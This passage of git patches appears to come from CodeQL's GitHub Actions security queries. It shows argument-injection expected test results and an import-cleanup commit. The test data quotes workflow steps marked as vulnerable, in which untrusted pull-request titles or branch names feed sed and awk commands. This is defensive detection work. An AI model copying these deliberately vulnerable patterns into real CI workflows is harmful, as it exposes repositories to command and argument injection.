.github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 90e7101e5fd6..12171d8c7f27 100644 --- a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,20 +1,23 @@ edges -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | -| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | nodes | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/arg_injection.yml:17:14:17:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | -| .github/workflows/arg_injection.yml:18:14:18:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | -| .github/workflows/arg_injection.yml:19:14:19:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | -| .github/workflows/arg_injection.yml:20:14:20:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | -| .github/workflows/arg_injection.yml:21:14:21:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | -| .github/workflows/arg_injection.yml:22:14:23:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | -| .github/workflows/arg_injection.yml:24:14:28:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:29:14:33:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/arg_injection.yml:34:14:36:41 | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | BODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths #select From c5c3cd1726b135e24958f8c6f2b26b872850b4d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 16 Oct 2024 11:47:35 +0200 Subject: [PATCH 588/707] Clean imports --- .../security/ArgumentInjectionQuery.qll | 1 - .../security/ArtifactPoisoningQuery.qll | 1 - .../actions/security/CachePoisoningQuery.qll | 2 -- .../codeql/actions/security/ControlChecks.qll | 3 +++ .../security/EnvPathInjectionQuery.qll | 23 ++++++++----------- .../actions/security/EnvVarInjectionQuery.qll | 3 --- .../security/OutputClobberingQuery.qll | 3 --- .../actions/security/PoisonableSteps.qll | 1 - .../security/SecretExfiltrationQuery.qll | 1 - .../actions/security/SelfHostedQuery.qll | 1 - .../UseOfKnownVulnerableActionQuery.qll | 1 - .../CompositeActionsSinks.ql | 0 .../CompositeActionsSources.ql | 0 .../CompositeActionsSummaries.ql | 0 .../ReusableWorkflowsSinks.ql | 0 .../ReusableWorkflowsSources.ql | 0 .../ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 1 + .../CWE-077/EnvPathInjectionCritical.ql | 1 + .../CWE-077/EnvPathInjectionMedium.ql | 1 + .../CWE-077/EnvVarInjectionCritical.ql | 1 + .../Security/CWE-077/EnvVarInjectionMedium.ql | 1 + .../Models/CompositeActionsSinks.qlref | 2 +- .../Models/CompositeActionsSources.qlref | 2 +- .../Models/CompositeActionsSummaries.qlref | 2 +- .../Models/ReusableWorkflowsSinks.qlref | 2 +- .../Models/ReusableWorkflowsSources.qlref | 2 +- .../Models/ReusableWorkflowsSummaries.qlref | 2 +- .../workflows/artifactpoisoning101.yml | 19 +++++++++++++++ .../ArtifactPoisoningCritical.expected | 4 ++++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 1 + 33 files changed, 52 insertions(+), 33 deletions(-) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/CompositeActionsSummaries.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSources.ql (100%) rename ql/src/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.ql (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning101.yml diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index f7e4a9834452..1d461cca3df2 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow abstract class ArgumentInjectionSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d06b125ca322..9355462962d5 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -1,7 +1,6 @@ import actions private import codeql.actions.TaintTracking import codeql.actions.DataFlow -private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.security.PoisonableSteps diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index a0113beed469..e5c5a3655101 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,6 +1,4 @@ import actions -import codeql.actions.config.Config -import codeql.actions.Helper string defaultBranchTriggerEvent() { result = diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 86c7d989522b..3b15fc78d10a 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -253,6 +253,9 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { or this.getArgument("exit") = "true" ) + or + this.getCallee() = "actions/github-script" and + this.getArgument("script").splitAt("\n").matches("%getMembershipForUserInOrg%") } } diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 859f625e068d..33efc9b1bc8f 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -3,20 +3,11 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvPathInjectionSink extends DataFlow::Node { } /** * Holds if a Run step declares a PATH environment variable with contents from a local file. - * e.g. - * run: | - * cat foo.txt >> $GITHUB_PATH - * echo "$(cat foo.txt)" >> $GITHUB_PATH - * FOO=$(cat foo.txt) - * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { @@ -28,11 +19,15 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScript() and step.getAFollowingStep() = run and ( + // echo "$(cat foo.txt)" >> $GITHUB_PATH + // FOO=$(cat foo.txt) + // echo "$FOO" >> $GITHUB_PATH exists(string cmd | - run.getScript().getACmdReachingGitHubPathWrite(cmd) and - run.getScript().getAFileReadCommand() = cmd + run.getScript().getAFileReadCommand() = cmd and + run.getScript().getACmdReachingGitHubPathWrite(cmd) ) or + // cat foo.txt >> $GITHUB_PATH run.getScript().fileToGitHubPath(_) ) ) @@ -91,8 +86,10 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run.getScript() and ( - run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) or - run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) or + run.getScript().getAnEnvReachingGitHubEnvWrite(var, _) + or + run.getScript().getAnEnvReachingGitHubOutputWrite(var, _) + or run.getScript().getAnEnvReachingGitHubPathWrite(var) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 13d6312b5856..99e9537a857d 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class EnvVarInjectionSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index e959c7d60ca5..58b7b18ca62b 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -3,9 +3,6 @@ private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery private import codeql.actions.security.UntrustedCheckoutQuery -private import codeql.actions.dataflow.FlowSteps -import codeql.actions.DataFlow -import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 0cc8f9131667..5e62aa675eeb 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config abstract class PoisonableStep extends Step { } diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll index 0317ab281990..18a480b1cecc 100644 --- a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -2,7 +2,6 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources -private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow private class SecretExfiltrationSink extends DataFlow::Node { diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 419b2ac81a97..14d36ef0fa85 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config bindingset[runner] predicate isGithubHostedRunner(string runner) { diff --git a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll index bbb021fe3d55..920b8ab9d209 100644 --- a/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll +++ b/ql/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll @@ -1,5 +1,4 @@ import actions -import codeql.actions.config.Config class KnownVulnerableAction extends UsesStep { string vulnerable_action; diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Models/CompositeActionsSinks.ql similarity index 100% rename from ql/src/Security/CWE-020/CompositeActionsSinks.ql rename to 